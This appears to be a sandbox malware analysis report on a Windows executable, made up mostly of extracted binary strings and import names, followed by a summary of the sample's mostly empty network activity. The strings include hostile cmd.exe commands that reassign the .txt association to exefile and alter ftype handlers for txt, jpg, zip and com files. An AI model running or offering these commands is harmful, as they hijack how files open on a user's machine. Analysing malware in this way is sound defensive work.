@u+@PWV
EPVcM s
u5SSWh|
E SSSSu
]M3G9]u
YE;t}SSuuu
e33Mu;u
V?Y;thE
WreY9]t
ev$dv(dv,dv0dv4dv
dv8dv<d@v@dvDdvHdvLdvPdvTdvXdv\
dv`wdvdodvhgdvl_dvpWdvtOdvxGdv|?d@
PWcY^]
PbYv$Dk
VtbY^]UV3PPPPPPPPU
u5EP3GWh|
V`YEn}
e}UWVSM
[^_UV3PPPPPPPPU
t78t2=`
3@_^[]
PYYtbF
EEuzEE
YXS9YtJU
t1SaYP
t@ t20t$@t
/t(;t$;t
8EPuuu
uWEY>j
u|Yj4h@
u8WW3FVh|
YE;t@E
t!SS9]
u1VY9]t
E;tWWu
EPSu u
YMMjDhh
39}t WWu
tjEEb9}u
WWWWVSWu
;tG3Vj
YYE;t43WWVPVSWu
HHtjHHtF
u9S\UC\
}]39Mt
WVE;Yu
;VWEN@
vOE}SLSFEPSS6E
EMu39S
tfEM_^fC
+t5-t00
uFQ3@}
G0t1|
HHu&Mj
PQYuuO
#fEEEEEEEEEEEE?E
PEPfU}Y
EPMYu}
EPNYuO
EPoEPfEPEPEPPEM
0H;s;s
@UWVSu
F'G8t,A<
WN^xd;=g
tXSjYe
EPKYu}
u5}u,e
MuVQTYYM39U
6UWVSM
B8t6t8t't
M}M}M3~M~M~M#
M{M|@F
g~X\~`Q~F~;~(0~
~|UzpzG{LG
Tuy}`}}X}(}}G
Xt}y^}G
X}qzy|<H
X|@izH
(|Xu|j|_|XT|I|X>|3|X(|
x({{X{X{({lI
({{{p{Xe{I
(K{X@{5{I
w(]zRzJ
8zX-z"z K
z(yyy\K
yyy`y(yXyK
|y0qyfy[y(PyXEyX:y`/y$y(
y(xx`x<L
xmtXxxWtxXxxuxtX{xpx(exZxOxXDxxsltL
wwXw(wwPM
uOuX7wM
w`v(vXv
(vXwvlvN
XRvXGvN
X-v("v
q0qH&rlsr
s$Zs`sxsT#
RegCloseKey
RegSetValueExW
RegCreateKeyExW
RegEnumValueW
RegQueryInfoKeyW
RegOpenKeyExW
RegQueryValueExW
RegEnumKeyW
RegEnumKeyExW
RegDeleteKeyW
RegFlushKey
RegDeleteValueW
RegNotifyChangeKeyValue
ADVAPI32.dll
lstrlenW
EnterCriticalSection
InterlockedIncrement
LeaveCriticalSection
InterlockedDecrement
GetSystemDirectoryW
GetCurrentDirectoryW
InitializeCriticalSection
GetFileAttributesW
GetModuleFileNameW
DeleteCriticalSection
CloseHandle
HeapFree
HeapAlloc
GetProcessHeap
lstrcpyW
lstrcmpW
GetWindowsDirectoryW
CompareFileTime
lstrlenA
GetVersionExW
WaitForMultipleObjects
WaitForSingleObject
SetEvent
GetCurrentThreadId
FreeLibrary
LoadLibraryW
GetCommandLineW
CreateEventW
GetSystemInfo
GetFullPathNameW
QueryPerformanceCounter
GetTickCount
GetCurrentProcessId
GetSystemTimeAsFileTime
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetStartupInfoA
GetCommandLineA
GetVersionExA
HeapReAlloc
RtlUnwind
ExitThread
TlsSetValue
TlsGetValue
GetLastError
CreateThread
ExitProcess
GetProcAddress
GetModuleHandleA
WriteFile
GetStdHandle
GetModuleFileNameA
FreeEnvironmentStringsA
GetEnvironmentStrings
FreeEnvironmentStringsW
WideCharToMultiByte
GetEnvironmentStringsW
SetHandleCount
GetFileType
TlsFree
SetLastError
TlsAlloc
HeapDestroy
HeapCreate
VirtualFree
VirtualAlloc
IsBadWritePtr
HeapSize
LoadLibraryA
GetACP
GetOEMCP
GetCPInfo
InterlockedExchange
VirtualQuery
GetStringTypeA
GetStringTypeW
VirtualProtect
MultiByteToWideChar
IsBadReadPtr
IsBadCodePtr
SetFilePointer
LCMapStringA
LCMapStringW
GetLocaleInfoA
SetStdHandle
FlushFileBuffers
CreateFileW
SetEndOfFile
ReadFile
KERNEL32.dll
GetTextExtentPointW
GDI32.dll
EnableWindow
SendMessageW
GetDlgItem
MessageBoxW
LoadStringW
wsprintfW
EndDialog
DialogBoxParamW
GetWindowLongW
CallNextHookEx
PostMessageW
IsWindowEnabled
GetKeyState
DestroyWindow
MessageBoxA
wsprintfA
LoadStringA
SetDlgItemTextW
ShowWindow
CheckDlgButton
SetWindowTextW
ReleaseDC
SetDlgItemInt
GetDlgItemInt
GetDlgItemTextW
CheckRadioButton
LoadIconW
SetForegroundWindow
KillTimer
SetTimer
SetFocus
GetFocus
SetWindowPos
AdjustWindowRectEx
GetWindowRect
CreateDialogParamW
GetClientRect
UpdateWindow
PostQuitMessage
UnhookWindowsHookEx
SetWindowsHookExW
DispatchMessageW
TranslateMessage
IsDialogMessageW
PeekMessageW
MsgWaitForMultipleObjects
GetDesktopWindow
USER32.dll
ImageList_Destroy
ImageList_ReplaceIcon
ImageList_Create
COMCTL32.dll
GetSaveFileNameW
comdlg32.dll
ShellExecuteW
SHELL32.dll
CoInitializeSecurity
CoInitialize
CoCreateInstance
CoUninitialize
ole32.dll
OLEAUT32.dll
Ix@oGAkU'9p|B
~QCv)/&D(
uuvHMXB
9;5SM]=];Z] T7aZ%]g']
?Zd;On
7?3=Bz
;1az?aUY~S|
D?$?9'
*?}d|FU>c{
zc%C1<!8G
u7.:3q
#2IZ9W
,%I-64OSk%Y
kkggfffl
{kgfvfffffl
gffffff
{kkfvfffffl
wvffffff{;s{vffffl
7'{kkfgwffff
3fwwfrfffl
k{kvp*ffff
2*gg2*jfff;"f{{kc2ffffl
2*j{"jfffl
;3"*w{p*fff
"g{0*jfff333
wff;30
"j{3""wffs33
""c2*"{fgl
"*z"3wffl7;;;30
" 3wfvl
{kffs;30
*#7fg|;3;3
*#{{wkwv|{;3;;30*gw|
{kkgg|{3;33
jgw;32{g|s3;;;0***g;333
"*{s332"
"*;{;3
"3;33{
#3;3;;;3{
7033ws333;;;;;
{{{{{{
kkggfffl
{kgfvfffffl
gffffff
{kkfvfffffl
wvffffff{;s{vffffl
7'{kkfgwffff
3fwwfrfffl
k{kvp*ffff
2*gg2*jfff;"f{{kc2ffffl
2*j{"jfffl
;3"*w{p*fff
"g{0*jfff333
wff;30
"j{3""wffs33
""c2*"{fgl
"*z"3wffl7;;;30
" 3wfvl
{kffs;30
*#7fg|;3;3
*#{{wkwv|{;3;;30*gw|
{kkgg|{3;33
jgw;32{g|s3;;;0***g;333
"*{s332"
"*;{;3
"3;33{
#3;3;;;3{
7033ws333;;;;;
{{{{{{
kkggfffl
{kgfvfffffl
gffffff
{kkfvfffffl
wvffffff{;s{vffffl
7'{kkfgwffff
3fwwfrfffl
k{kvp*ffff
2*gg2*jfff;"f{{kc2ffffl
2*j{"jfffl
;3"*w{p*fff
"g{0*jfff333
wff;30
"j{3""wffs33
""c2*"{fgl
"*z"3wffl7;;;30
" 3wfvl
{kffs;30
*#7fg|;3;3
*#{{wkwv|{;3;;30*gw|
{kkgg|{3;33
jgw;32{g|s3;;;0***g;333
"*{s332"
"*;{;3
"3;33{
#3;3;;;3{
7033ws333;;;;;
{{{{{{
vvvfff
wffffl
w{kffvff
2{wwvffl
0*kkvpffl
"ws*ffl3
"*k0vls0
"*2"vf;;3
wffs330
{{wk{;;32g
330*gks3
"s0"*#0
;;33;{w3
33w73;;;7{{{{{{{|
vvvfff
wffffl
w{kffvff
2{wwvffl
0*kkvpffl
"ws*ffl3
"*k0vls0
"*2"vf;;3
wffs330
{{wk{;;32g
330*gks3
"s0"*#0
;;33;{w3
33w73;;;7{{{{{{{|
vvvfff
wffffl
w{kffvff
2{wwvffl
0*kkvpffl
"ws*ffl3
"*k0vls0
"*2"vf;;3
wffs330
{{wk{;;32g
330*gks3
"s0"*#0
;;33;{w3
33w73;;;7{{{{{{{|
wgvl2{pf
l;0*vl30'l332gl30*{
0#233;70?kk
wgvl2{pf
l;0*vl30'l332gl30*{
0#233;70?kk
wgvl2{pf
l;0*vl30'l332gl30*{
0#233;70?kk
\djpx~HHVZdjs~@@HV\fs~LBHHQYamxBBLLQQVYdjs~FFLLLH@HSXZdmxFFFBB;;3<CUSYajs~DDD<<333*=ieUV\fpxD><<5%%%
^XZdms~N>>5%%%
$cYajsxNC>5
r[afpx~C>8*
cZdjsxzNC8'
n[\djs{}
cY\flzq
nXY\ce
GgLTW`
q}z]O:"
_enuv~]O:"
hi^ckmpsx]O:
i^[\adfjm~~gW:
^XYYZ\\dpxo]=)
.TQQVVVYfxso]K1
rHHHHQQZp~xpogW=)
^@@@@HVfsppoW=1
o;3;;Q\jfoeK=
<33HVadooW=1
C3@QYdweK7
i>HQVtoWI$
R>LVZweWR
-:<LVtweIE.J
>FSbwteRE.J
M$8<LXyteRE.J
.M$6<FS
teRE.J
weREMJ
yei_`G
!0:9CDTyytiqh`-
(29?CNUw
|}iqRK=:000//+449??NNUUw
|teeWWOAAAAOOPPPPUUty
yoggg]]]^^^^^^orrrrrnnn^^
\djpx~HHVZdjs~@@HV\fs~LBHHQYamxBBLLQQVYdjs~FFLLLH@HSXZdmxFFFBB;;3<CUSYajs~DDD<<333*=ieUV\fpxD><<5%%%
^XZdms~N>>5%%%
$cYajsxNC>5
r[afpx~C>8*
cZdjsxzNC8'
n[\djs{}
cY\flzq
nXY\ce
GgLTW`
q}z]O:"
_enuv~]O:"
hi^ckmpsx]O:
i^[\adfjm~~gW:
^XYYZ\\dpxo]=)
.TQQVVVYfxso]K1
rHHHHQQZp~xpogW=)
^@@@@HVfsppoW=1
o;3;;Q\jfoeK=
<33HVadooW=1
C3@QYdweK7
i>HQVtoWI$
R>LVZweWR
-:<LVtweIE.J
>FSbwteRE.J
M$8<LXyteRE.J
.M$6<FS
teRE.J
weREMJ
yei_`G
!0:9CDTyytiqh`-
(29?CNUw
|}iqRK=:000//+449??NNUUw
|teeWWOAAAAOOPPPPUUty
yoggg]]]^^^^^^orrrrrnnn^^
\djpx~HHVZdjs~@@HV\fs~LBHHQYamxBBLLQQVYdjs~FFLLLH@HSXZdmxFFFBB;;3<CUSYajs~DDD<<333*=ieUV\fpxD><<5%%%
^XZdms~N>>5%%%
$cYajsxNC>5
r[afpx~C>8*
cZdjsxzNC8'
n[\djs{}
cY\flzq
nXY\ce
GgLTW`
q}z]O:"
_enuv~]O:"
hi^ckmpsx]O:
i^[\adfjm~~gW:
^XYYZ\\dpxo]=)
.TQQVVVYfxso]K1
rHHHHQQZp~xpogW=)
^@@@@HVfsppoW=1
o;3;;Q\jfoeK=
<33HVadooW=1
C3@QYdweK7
i>HQVtoWI$
R>LVZweWR
-:<LVtweIE.J
>FSbwteRE.J
M$8<LXyteRE.J
.M$6<FS
teRE.J
weREMJ
yei_`G
!0:9CDTyytiqh`-
(29?CNUw
|}iqRK=:000//+449??NNUUw
|teeWWOAAAAOOPPPPUUty
yoggg]]]^^^^^^orrrrrnnn^^
cjpw~IIQcs~DDDIQcp{E>>336JNUjs~B66-)0uWM_m{B6-&
!khUjs|8)
h_lt=2#
S^hlow~\C
uTV__j{weC+
vNKMUp~seR9
WEIcsmaa9'
fEQjcnH1
FKUnb?(
CDKbq^S.
58DMqvgX
2>GyxgXiX
,+6EbyxgXi
.,'8ENfyxgk
/18BLfyvu}k@!
+1<ABLqxt^H<772::=FJJ]qyrne`\OWWWJJ\eedddWO
cjpw~IIQcs~DDDIQcp{E>>336JNUjs~B66-)0uWM_m{B6-&
!khUjs|8)
h_lt=2#
S^hlow~\C
uTV__j{weC+
vNKMUp~seR9
WEIcsmaa9'
fEQjcnH1
FKUnb?(
CDKbq^S.
58DMqvgX
2>GyxgXiX
,+6EbyxgXi
.,'8ENfyxgk
/18BLfyvu}k@!
+1<ABLqxt^H<772::=FJJ]qyrne`\OWWWJJ\eedddWO
cjpw~IIQcs~DDDIQcp{E>>336JNUjs~B66-)0uWM_m{B6-&
!khUjs|8)
h_lt=2#
S^hlow~\C
uTV__j{weC+
vNKMUp~seR9
WEIcsmaa9'
fEQjcnH1
FKUnb?(
CDKbq^S.
58DMqvgX
2>GyxgXiX
,+6EbyxgXi
.,'8ENfyxgk
/18BLfyvu}k@!
+1<ABLqxt^H<772::=FJJ]qyrne`\OWWWJJ\eedddWO
2DJMQ ;8HLSWU
]?9IO\V
iz7>v}X
ok~dbsYQ
lqwKNM
e|4:HJ#
c`r@'0E-
u`_dh{Z(6")mga^Rnx%=.pjfy
lt,&CB
*$<71/+8?!k
2DJMQ ;8HLSWU
]?9IO\V
iz7>v}X
ok~dbsYQ
lqwKNM
e|4:HJ#
c`r@'0E-
u`_dh{Z(6")mga^Rnx%=.pjfy
lt,&CB
*$<71/+8?!k
2DJMQ ;8HLSWU
]?9IO\V
iz7>v}X
ok~dbsYQ
lqwKNM
e|4:HJ#
c`r@'0E-
u`_dh{Z(6")mga^Rnx%=.pjfy
lt,&CB
*$<71/+8?!k
))77DDQQ__kkppqqooee
((88EEPP[[ffppxx
++::HHVVeeqq}}yy_AA
JJJt))^!!&&..55CCOO]]mmzz
DDD"$$ %%--//2244::DDPPZZhhtt
NNN$%%""%%**++**((%%''1199EEQQ__kkxx
ZZZ"$$!!%%$$""
--55BBNN[[gguu
--9977==IIVVbbllxx
CbbZnn@@==FFRR^^hhss||
&KqddBBCCOOZZddnnyyzz
OO7WW?z
BcNNCCLLUU``jjss||zzYY<$$
5Ur^^DDFFPPZZddmmssffd66
(FcMMCCJJSS\\eeeeII/
6UrjjCCCCKKTTZZRRg..
(EcGG<<AAIILL::4
6Uv\\;;77>>99h!!
&FeAA//00''8
3RmNN,,##]
=Up;;d JJ
__::^<<yymm
d++GG__ss{{
b""::OO__ffppxx||
((>>MMWW]]``ddmm}}xx
-H}}0077CCKKOORRUUXX^^ppnn
!7SZZ>>==@@CCFFHHJJPPbbxxbb
7Rs[[::4477::;;>>BBUUkkxxWW
*GdOO****++..0066GGbbuunnLL###X
AA@@''
""((<<UUff``BB)))E
==OGG//
11HH[[VV<<5550@@@
''>>NNIIK<<jMMM
BBEE**
1K^n||
""55AA??FFFIiii
==KKK66
'9FW44
))7788AA]]],
FFCC--
++8899XXXQ
>>RKK==%%
//66BBttt.
EEJJ66
%%33<<kkkE
,,88RRk$
??YOOGG33
&&11DD.
DDtPPHH22
%%//<<3
GG~SSJJ55""c
##..::1
FFuRRMM<<((h
$$,,77+
PPBB22p%%H
!!**,,
>>)JJRRMMBB44{))!!
$$,,--//DDF
DDSJJPPLLCC<<33**%%
!!##%%**..11,,00c
<<LFFLL
QQLLFFBB>><<::8877::<<====66
00..Wiii
@@PCCFFHH
JJMMMMKKIIDD
==9911Xz77
))77DDQQ__kkppqqooee
((88EEPP[[ffppxx
++::HHVVeeqq}}yy_AA
JJJt))^!!&&..55CCOO]]mmzz
DDD"$$ %%--//2244::DDPPZZhhtt
NNN$%%""%%**++**((%%''1199EEQQ__kkxx
ZZZ"$$!!%%$$""
--55BBNN[[gguu
--9977==IIVVbbllxx
CbbZnn@@==FFRR^^hhss||
&KqddBBCCOOZZddnnyyzz
OO7WW?z
BcNNCCLLUU``jjss||zzYY<$$
5Ur^^DDFFPPZZddmmssffd66
(FcMMCCJJSS\\eeeeII/
6UrjjCCCCKKTTZZRRg..
(EcGG<<AAIILL::4
6Uv\\;;77>>99h!!
&FeAA//00''8
3RmNN,,##]
=Up;;d JJ
__::^<<yymm
d++GG__ss{{
b""::OO__ffppxx||
((>>MMWW]]``ddmm}}xx
-H}}0077CCKKOORRUUXX^^ppnn
!7SZZ>>==@@CCFFHHJJPPbbxxbb
7Rs[[::4477::;;>>BBUUkkxxWW
*GdOO****++..0066GGbbuunnLL###X
AA@@''
""((<<UUff``BB)))E
==OGG//
11HH[[VV<<5550@@@
''>>NNIIK<<jMMM
BBEE**
1K^n||
""55AA??FFFIiii
==KKK66
'9FW44
))7788AA]]],
FFCC--
++8899XXXQ
>>RKK==%%
//66BBttt.
EEJJ66
%%33<<kkkE
,,88RRk$
??YOOGG33
&&11DD.
DDtPPHH22
%%//<<3
GG~SSJJ55""c
##..::1
FFuRRMM<<((h
$$,,77+
PPBB22p%%H
!!**,,
>>)JJRRMMBB44{))!!
$$,,--//DDF
DDSJJPPLLCC<<33**%%
!!##%%**..11,,00c
<<LFFLL
QQLLFFBB>><<::8877::<<====66
00..Wiii
@@PCCFFHH
JJMMMMKKIIDD
==9911Xz77
))77DDQQ__kkppqqooee
((88EEPP[[ffppxx
++::HHVVeeqq}}yy_AA
JJJt))^!!&&..55CCOO]]mmzz
DDD"$$ %%--//2244::DDPPZZhhtt
NNN$%%""%%**++**((%%''1199EEQQ__kkxx
ZZZ"$$!!%%$$""
--55BBNN[[gguu
--9977==IIVVbbllxx
CbbZnn@@==FFRR^^hhss||
&KqddBBCCOOZZddnnyyzz
OO7WW?z
BcNNCCLLUU``jjss||zzYY<$$
5Ur^^DDFFPPZZddmmssffd66
(FcMMCCJJSS\\eeeeII/
6UrjjCCCCKKTTZZRRg..
(EcGG<<AAIILL::4
6Uv\\;;77>>99h!!
&FeAA//00''8
3RmNN,,##]
=Up;;d JJ
__::^<<yymm
d++GG__ss{{
b""::OO__ffppxx||
((>>MMWW]]``ddmm}}xx
-H}}0077CCKKOORRUUXX^^ppnn
!7SZZ>>==@@CCFFHHJJPPbbxxbb
7Rs[[::4477::;;>>BBUUkkxxWW
*GdOO****++..0066GGbbuunnLL###X
AA@@''
""((<<UUff``BB)))E
==OGG//
11HH[[VV<<5550@@@
''>>NNIIK<<jMMM
BBEE**
1K^n||
""55AA??FFFIiii
==KKK66
'9FW44
))7788AA]]],
FFCC--
++8899XXXQ
>>RKK==%%
//66BBttt.
EEJJ66
%%33<<kkkE
,,88RRk$
??YOOGG33
&&11DD.
DDtPPHH22
%%//<<3
GG~SSJJ55""c
##..::1
FFuRRMM<<((h
$$,,77+
PPBB22p%%H
!!**,,
>>)JJRRMMBB44{))!!
$$,,--//DDF
DDSJJPPLLCC<<33**%%
!!##%%**..11,,00c
<<LFFLL
QQLLFFBB>><<::8877::<<====66
00..Wiii
@@PCCFFHH
JJMMMMKKIIDD
==9911Xz77
<<<3l44e::FFWWggvv
UUU'88n..99KK\\rr
_ZZ322000022==IIYYjj||
HHG..%%$$
22<<NNaatt6))
II?&&
w00y??DDWWhhzz
~xx &&
"<`YYDDSSeevv}}~QQ1h
5Y}MMOOaarruuTT)''
*OnccMM\\iibbN))
>`}NNUU[[BB
%Lh[[HHHHN
.Pe;;00
1FgPPA--
N##DDdd
55MM\\eeuu
#9}66BBMMSSWWaa}}ww
<\JJ@@@@DDNNkkii
.Qq[[BB55;;[[ssYY
4Vl{AA//JJbbII
55iKK,,
,EP`,,??OO<<
))II>>
";%%66<<n66f!!!
<<MM//N
5544<<<3
GGm''+
++66::nCCC
66zRREEe##)
1199UUU'
>>UUEEf%%*
0066c__3
BBXXIIl,,1
++22HHG
??WWOOx;;J&&5
%%0011LL@
VVLL==11##
!!**220000~xx
''488HHSSQQKKEEBB>>==@@AA>>55--55H
!!//g::CC
GGJJJJFF>>
11++p33-
<<<3l44e::FFWWggvv
UUU'88n..99KK\\rr
_ZZ322000022==IIYYjj||
HHG..%%$$
22<<NNaatt6))
II?&&
w00y??DDWWhhzz
~xx &&
"<`YYDDSSeevv}}~QQ1h
5Y}MMOOaarruuTT)''
*OnccMM\\iibbN))
>`}NNUU[[BB
%Lh[[HHHHN
.Pe;;00
1FgPPA--
N##DDdd
55MM\\eeuu
"A56FEF968405E3FA8E2EFED7D055C9FB
149DD4FE3087466A536A3BA52AB85C84
19F63F2B6D10697F91CD22B562DECEE3
11F614FECA1A9A76324A20CF617C1099
48CFFA37EF597E92A52CF56F77A565F1
4BF45A7926E19D9370BCAB556B9BCCA0
4BF45A7926E19D9370BCAB556B9BCCA0
036CE93B90DAC08AF7CD2E90B4EE34C4
71E4E8C28B32637C807C1709F6635CD0
9C45DEA16AECFDDCB6F0A2809999CBE5
9C45DEA16AECFDDCB6F0A2809999CBE5
3D30F6E74C00F3A36020530184FB7EAE
B2B24A77CB831C4C335F0FC6DA0F3FC3
ACD8D4F938A3039CCC87730FDCF9783C
5BA96C292B42C577A803E3BCE1AF41F4
EC73298EF3489086273E6A422E92FBB2
DAC7C5F4450E7212D55356938EE141BE
9B571D7E0539F790AA24A1497657E93B
9BA7B2D56438DD1E5A2DBC0C26DBECCC
9ED60F7425F9B390322AEA09B758828B
A6CD91D7AB63DF54F84FFF4781E5073C
6DFC0B25704F6B6935FA7F98FC8E50C4
6B4EA2ED6F56FC0DC05D3F3142EE7958
9D0B13C641F33A70C42A1AE5E3A678D5
3DE1BF17B2E2469DF9B39CC3C15CF609
17FC52B24168BABC94C49C1024E8FCF9
0AC808DC135BF096E2764BEAAF45C40A
3144DCFA6FDB7082DB8197CDFD66E5C2
D01E78D2C8E4CA57FCD8EBC64FB8F165
A9439B4F830889DBA0F9287BBC634B87
15EDB54713F86F97C377F89D5998897F
D4233D0B5B0EB2A3BD93ADDE837F8FFB
D4233D0B5B0EB2A3BD93ADDE837F8FFB
11030D5F49B7EFF1269D629BDEDF572C
37CB2E7D66172092C2E5A7ED99B8BA5E
46B8246B170D6BB4BBF187A020935EE1
E96C3441E3BE663C51CD273F1F126282
6B8206675CA99595602CB95555080A41
15315CCC2F625C081C269F1665DB3882
043B6913EC40E5C09FDD0187F55F1356
CFFD3D0D5F34CEE1A5F93928752AE125
2305B3E0A250A53EB10F7C02FE24D2C9
BD67269AC6D46F54D9F2505D0936FA2D
06A987B724E092FFB4F615837284E83E
104B216A6940B9A3CFEEE090521DF5C3
F8AA93885BEAF669A3B74A37FA7869EE
cmd.exe
Md5_String_Calc
C:\123.bat
cmd.exe /c assoc .txt = exefile
cmd.exe /c ftype comfile=
cmd.exe /c ftype zipfile=
cmd.exe /c ftype jpgfile=
cmd.exe /c ftype txtfile=
znkzz
virus QQ 621370902
VS_VERSION_INFO
StringFileInfo
080404B0
CompanyName
FileDescription
LegalCopyright
LegalTrademarks
ProductName
FileVersion
ProductVersion
InternalName
OriginalFilename
VarFileInfo
Translation
cmd.exe
Md5_String_Calc
C:\123.bat
cmd.exe /c assoc .txt = exefile
cmd.exe /c ftype comfile=
cmd.exe /c ftype zipfile=
cmd.exe /c ftype jpgfile=
cmd.exe /c ftype txtfile=
znkzz
virus QQ 621370902
VS_VERSION_INFO
StringFileInfo
080404B0
CompanyName
FileDescription
LegalCopyright
LegalTrademarks
ProductName
FileVersion
ProductVersion
InternalName
OriginalFilename
VarFileInfo
Translation
(&4-27;
(&4-27;
(&4-27;
`\khcq
`\khcq
`\khcq
cmd.exe
Md5_String_Calc
C:\123.bat
cmd.exe /c assoc .txt = exefile
cmd.exe /c ftype comfile=
cmd.exe /c ftype zipfile=
cmd.exe /c ftype jpgfile=
cmd.exe /c ftype txtfile=
znkzz
virus QQ 621370902
VS_VERSION_INFO
StringFileInfo
080404B0
CompanyName
FileDescription
LegalCopyright
LegalTrademarks
ProductName
FileVersion
ProductVersion
InternalName
OriginalFilename
VarFileInfo
Translation
cmd.exe
Md5_String_Calc
C:\123.bat
cmd.exe /c assoc .txt = exefile
cmd.exe /c ftype comfile=
cmd.exe /c ftype zipfile=
cmd.exe /c ftype jpgfile=
cmd.exe /c ftype txtfile=
znkzz
virus QQ 621370902
VS_VERSION_INFO
StringFileInfo
080404B0
CompanyName
FileDescription
LegalCopyright
LegalTrademarks
ProductName
FileVersion
ProductVersion
InternalName
OriginalFilename
VarFileInfo
Translation
(&4-27;
(&4-27;
(&4-27;
`\khcq
`\khcq
`\khcq

TCP

No TCP connections recorded.

UDP

Source Source Port Destination Destination Port
192.168.56.101 53179 224.0.0.252 5355
192.168.56.101 49642 224.0.0.252 5355
192.168.56.101 137 192.168.56.255 137
192.168.56.101 61714 114.114.114.114 53
192.168.56.101 61714 8.8.8.8 53
192.168.56.101 56933 8.8.8.8 53
192.168.56.101 138 192.168.56.255 138
192.168.56.101 58485 114.114.114.114 53
192.168.56.101 58485 8.8.8.8 53
192.168.56.101 57665 114.114.114.114 53

HTTP & HTTPS Requests

No HTTP requests performed.

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.